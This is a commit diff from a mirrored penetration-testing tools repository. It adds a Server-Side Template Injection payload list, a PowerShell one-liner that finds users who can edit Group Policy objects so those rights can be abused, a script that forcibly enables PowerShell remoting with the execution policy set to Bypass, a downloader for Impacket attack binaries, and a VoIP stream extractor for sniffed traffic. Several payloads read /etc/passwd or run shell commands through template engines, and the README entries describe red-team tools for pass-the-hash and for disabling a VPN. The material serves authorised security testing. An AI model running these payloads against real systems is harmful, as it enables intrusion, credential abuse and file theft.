mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 18:11:37 +01:00
Dropped a bunch of various scripts.
This commit is contained in:
parent
e839e64db2
commit
1bf88bef0b
@ -5,4 +5,6 @@
|
||||
|
||||
- **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da))
|
||||
|
||||
- **`xor-key-recovery.py`** - Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length - it searches for proper key that could decrypt cipher into text. ([gist](https://gist.github.com/mgeeky/589b2cf781901288dfea0894a780ff98))
|
||||
- **`playRTPStream.sh`** - Using rtpdump to play RTP streams from PCAP files with VLC. This script was useful to extract RTP Streams from sniffed VoIP communication and then with a help of VLC to dump those streams into valid .wav files. (https://github.com/hdiniz/rtpdump). [gist](https://gist.github.com/mgeeky/0b8bd81a3f6fb70eec543bc0bae2f079)
|
||||
|
||||
- **`xor-key-recovery.py`** - Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length - it searches for proper key that could decrypt cipher into text. ([gist](https://gist.github.com/mgeeky/589b2cf781901288dfea0894a780ff98))
|
||||
|
45
others/playRTPStream.sh
Normal file
45
others/playRTPStream.sh
Normal file
@ -0,0 +1,45 @@
|
||||
#!/bin/bash
|
||||
|
||||
rtpdump_bin=/home/user/tools/rtpdump/rtpdump
|
||||
|
||||
if (( $# < 2 )); then
|
||||
echo
|
||||
echo This script tries to extract RTP streams from PCAP file using
|
||||
echo https://github.com/hdiniz/rtpdump
|
||||
echo utility and passing that stream to VLC player, or to output file.
|
||||
echo
|
||||
#echo "Usage: playStream.sh <file> <streamNum> [outfile]"
|
||||
echo "Usage: playStream.sh <file> <streamNum>"
|
||||
echo
|
||||
echo " file - pcap file to process."
|
||||
echo " streamNum - number of stream to play, or '-l' to list them."
|
||||
#echo " outfile - (optional) path to output file where to dump that stream."
|
||||
echo
|
||||
exit 1
|
||||
fi
|
||||
|
||||
file=$1
|
||||
num=$2
|
||||
vlc_bin=cvlc
|
||||
|
||||
if [ "$num" == "-l" ]; then
|
||||
$rtpdump_bin streams $file
|
||||
else
|
||||
|
||||
if (( $# > 2 )); then
|
||||
echo "[ERROR] Not implemented at the moment."
|
||||
#outfile=$3
|
||||
#echo "[Step 1]: Dumping RTP stream ($num) to file ($outfile)"
|
||||
#nc -nlp 4444 127.0.0.1 > $outfile &
|
||||
#echo $num | $rtpdump_bin play --host 0.0.0.0 --port 4444 $file > /dev/null
|
||||
#echo "[Step 2]: File: $outfile written."
|
||||
else
|
||||
echo "[Step 1]: Starting VLC on 0.0.0.0:4444"
|
||||
$vlc_bin rtp://@0.0.0.0:4444 2> /dev/null &disown;
|
||||
|
||||
echo "[Step 2]: Playing RTP stream ($num) on 0.0.0.0:4444"
|
||||
echo $num | $rtpdump_bin play --host 0.0.0.0 --port 4444 $file > /dev/null
|
||||
|
||||
pkill vlc
|
||||
fi
|
||||
fi
|
1
red-teaming/Find-GPODelegatedUsers.ps1
Normal file
1
red-teaming/Find-GPODelegatedUsers.ps1
Normal file
@ -0,0 +1 @@
|
||||
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | %{$acl=$_; $a=[string]$acl.IdentityReference; $b=$a.Substring($a.IndexOf("\")+1); $c=$null; $c=Get-NetUser "$b"; If ($c -ne $null -And $c.userprincipalname -like "*") { $dn=$acl.ObjectDN; If($dn -match 'CN=({[0-9A-F\-]+}),.+'){ $cn=$matches[1]; $gpo=Get-NetGPO -GPOname "$cn"; Write-Output "User: $b / $($c.userprincipalname) - delegated to GPO: $($gpo.displayname)"}}}
|
@ -66,6 +66,8 @@ Loaded $StealthUserHunterShowAll results.
|
||||
Loaded $UserHunterShowAll results.
|
||||
```
|
||||
|
||||
- **`Find-GPODelegatedUsers.ps1`** - One-liner for finding GPO Delegated users that can Edit Settings of that GPO and thus could be used to Abuse GPO Permissions (https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/). [gist](https://gist.github.com/mgeeky/5843df09607123772a61e782a6406d54)
|
||||
|
||||
- **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb))
|
||||
|
||||
Example output **not minimized**:
|
||||
|
4
web/payloads/README.md
Normal file
4
web/payloads/README.md
Normal file
@ -0,0 +1,4 @@
|
||||
## Web Applications penetration testing related PAYLOADS that are actually useful
|
||||
|
||||
- **`Server-Side-Template-Injections.txt`** - Various Server-Side Template Injection static payloads, targeting couple of various templating implementations (also some of the Client-Side ones like in AngularJS). The evaluated expression to look/grep for is: **1868686868**. Use it with Burp Intruder's Grep functionality, or simply look out for that pattern while hanging around the application. ([gist](https://gist.github.com/mgeeky/2b660ab8d3946eec519731ed9ec5d25b))
|
||||
|
45
web/payloads/Server-Side-Template-Injections.txt
Executable file
45
web/payloads/Server-Side-Template-Injections.txt
Executable file
@ -0,0 +1,45 @@
|
||||
##### LOOK FOR 1868686868
|
||||
<%= 666 * 666 %>
|
||||
<%= File.open('/etc/passwd').read %>
|
||||
${36692*50929}
|
||||
aaaaaaaaaaaaaaaaaaaaaa{*cccccccccccccccccccccccccccccccc*}bbbbbbbbbbbbbbbbbbbbbbbbb
|
||||
${"aaaaaaaaaaaaaaaaaaaaaa".join("bbbbbbbbbbbbbbbbbbbbbbbbb")}
|
||||
${36692*'50929'}
|
||||
${{36692*50929}}
|
||||
${{36692*'50929'}}
|
||||
{{36692*'50929'}}
|
||||
{{36692*50929}}
|
||||
[[36692*50929]]
|
||||
${{36692*50929}}
|
||||
${class.getClassLoader()}
|
||||
${class.getResource("").getPath()}
|
||||
${class.getResource("../../../../../index.htm").getContent()}
|
||||
{{self}}
|
||||
{php}echo 36692*50929;{/php}
|
||||
{{velocity}}36692*50929;{{/velocity}}
|
||||
{{python}}36692*50929;{{/python}}
|
||||
<#assign
|
||||
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
= root
|
||||
= 36692 * 50929
|
||||
<% x=36692*50929 %>${x}
|
||||
{{ [].class.base.subclasses() }}
|
||||
{{''.class.mro()[1].subclasses()}}
|
||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
|
||||
{{request|attr(["_"*2,"class","_"*2]|join)}}
|
||||
{{request|attr(["__","class","__"]|join)}}
|
||||
{{request|attr("__class__")}}
|
||||
{{request.__class__}}
|
||||
aaaaaaaaaaaaaaaaaaaaaa{{''.__class__.__mro__[2].__subclasses__()[233]}}bbbbbbbbbbbbbbbbbbbbbbbbb
|
||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("uname+-a")}}
|
||||
$class
|
||||
#set( $foo = "aaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbb") $foo
|
||||
#set( $foo = "aaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbb") $foo.class
|
||||
${fffffffffffffffffffffff}
|
||||
{{ffffffffffffffffffff}}
|
||||
[[ffffffffffffffffffffff]]
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
|
1
windows/Force-PSRemoting.ps1
Normal file
1
windows/Force-PSRemoting.ps1
Normal file
@ -0,0 +1 @@
|
||||
Set-ExecutionPolicy -ExecutionPolicy Bypass ; Start-Service winrm ; Get-NetConnectionProfile | Set-NetConnectionProfile -NetworkCategory Private ; Enable-PSRemoting -SkipNetworkProfileCheck -Force ; winrm quickconfig ; Configure-SMRemoting -Force -Enable
|
@ -3,6 +3,8 @@
|
||||
|
||||
- **`awareness.bat`** - Little and quick Windows Situational-Awareness set of commands to execute after gaining initial foothold (coming from APT34: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html ) ([gist](https://gist.github.com/mgeeky/237b48e0bb6546acb53696228ab50794))
|
||||
|
||||
- **`Force-PSRemoting.ps1`** - Forcefully enable WinRM / PSRemoting. [gist](https://gist.github.com/mgeeky/313c22def5c86d7a529f41e5b6ff79b8)
|
||||
|
||||
- **`GlobalProtectDisable.cpp`** - Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode. ([gist](https://gist.github.com/mgeeky/54ac676226a1a4bd9fd8653e24adc2e9))
|
||||
|
||||
Steps are following:
|
||||
@ -16,6 +18,7 @@
|
||||
After those steps - the GlobalProtect will disable itself cleanly.
|
||||
From now on, the GlobalProtect will remain disabled until you reboot the machine (or restart the PanGPA.exe process or PanGPS service).
|
||||
|
||||
- **`impacket-binaries.sh`** - Simple one-liner that downloads all of the Windows EXE impacket binaries put out in [Impacket Binaries](https://github.com/ropnop/impacket_static_binaries) repo. [gist](https://gist.github.com/mgeeky/2f990f14f1e7cf78fce21b8761234604)
|
||||
|
||||
- **`pth-carpet.py`** - Pass-The-Hash Carpet Bombing utility - trying every provided hash against every specified machine. ([gist](https://gist.github.com/mgeeky/3018bf3643f80798bde75c17571a38a9))
|
||||
|
||||
|
1
windows/impacket-binaries.sh
Normal file
1
windows/impacket-binaries.sh
Normal file
@ -0,0 +1 @@
|
||||
curl -s https://api.github.com/repos/ropnop/impacket_static_binaries/releases/latest | grep "browser_download_url.*exe" | cut -d : -f 2,3 | tr -d \" | wget -qi -
|
Loading…
Reference in New Issue
Block a user